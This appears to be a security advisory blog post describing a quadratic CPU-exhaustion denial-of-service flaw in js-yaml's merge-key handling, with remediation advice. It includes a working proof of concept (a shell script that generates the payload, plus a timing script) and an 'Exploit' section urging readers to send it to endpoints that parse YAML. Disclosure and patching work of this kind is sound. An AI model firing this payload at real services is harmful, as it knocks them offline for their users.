Listen to this Post
Intro – How the vulnerability works
The issue resides in js-yaml’s handling of the YAML 1.1 merge key (<<). When a mapping contains a merge key whose value is a sequence of aliases, e.g. <<: [a, a, a, ...], the library processes every alias in the sequence individually. Each alias resolves to the same anchored object (say `&a` with `K` keys). The parser calls `mergeMappings()` for each of the `M` aliases. Inside mergeMappings(), it retrieves `Object.keys(source)` (cost O(K)) and then checks `_hasOwnProperty.call(destination, key)` for every key, another `O(K)` operation. After the first merge, subsequent merges are semantic no‑ops because all keys already exist, yet the code repeats the full key enumeration. Total work becomes `O(K M)` while input size is only O(K + M). This quadratic scaling allows an attacker to craft a YAML document of just tens of kilobytes that blocks a Node.js event loop for seconds. The vulnerable code path is in `lib/loader.js` in `storeMappingPair()` (lines ~359‑366) when `keyTag === ‘tag:yaml.org,2002:merge’` and `valueNode` is an array. The function iterates without deduplicating identical alias references. The YAML spec does not require reprocessing duplicate sources – merges are idempotent and commutative, so collapsing duplicates preserves exact behavior. Proof‑of‑concept payloads with `K = M = 8000` (86 KB input) cause parse times of ~3.5 seconds, while a single merge of the same map finishes in ~5 ms. This denial‑of‑service vulnerability affects any Node.js service that parses untrusted YAML using js‑yaml, including API gateways, CI pipelines, and configuration loaders.
DailyCVE Form:
Platform: js-yaml Node.js
Version: 4.1.1
Vulnerability: Quadratic CPU exhaustion
Severity: Medium
Date: 2026-06-15
Prediction: Within one month
What Undercode Say:
Analytics – reproduction commands & PoC:
Generate payload with K keys and M merges
cat > poc.yaml <<EOF
a: &a
$(for i in $(seq 1 $K); do echo " key$i: 0"; done)
b:
<<: [$(printf 'a,%.0s' $(seq 1 $M) | sed 's/,$//')]
EOF
Measure parse time (Node.js script)
node -e "
const yaml = require('js-yaml');
const fs = require('fs');
const data = fs.readFileSync('poc.yaml', 'utf8');
console.time('parse');
yaml.load(data);
console.timeEnd('parse');
"
Observed timings (K=M):
K=1000 -> 33-36 ms, K=2000 -> 121-123 ms
K=4000 -> 524-537 ms, K=6000 -> 1608-1829 ms
K=8000 -> 3395-3565 ms
Exploit:
Craft a YAML document with one large anchored map (&a containing `K` arbitrary keys) and a second mapping that merges the same alias `M` times inside a sequence: <<: [a, a, ..., a]. Send this document to any endpoint that parses YAML with js‑yaml version 4.1.1 (or prior versions with the same merge logic). The server will spend `O(KM)` CPU time, exhausting the event loop and causing denial of service for other requests. A payload of 86 KB can produce ~3.5 seconds of blocking.
Protection:
- Apply the deduplication fix inside
storeMappingPair(): when encountering an array merge value, iterate through its elements, skip duplicate references using aSet, and call `mergeMappings()` only once per unique source. - Upgrade js‑yaml to a patched version (once available) – expected within one month.
- As a workaround, validate and reject YAML inputs that contain merge sequences with repeated aliases, or limit the maximum size of merge sequences.
- Use a YAML parser with built‑in complexity guards, or parse untrusted YAML in a separate isolated process with a timeout.
Impact:
Denial of service through CPU exhaustion. An attacker with network access to a service that parses user‑supplied YAML can cause prolonged event‑loop blocking, increased response latency, and potential cascading failures in Node.js applications. The attack requires only tens of kilobytes of data, making it feasible even over low‑bandwidth connections. No privilege escalation or data leakage occurs, but availability of the service is severely degraded.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
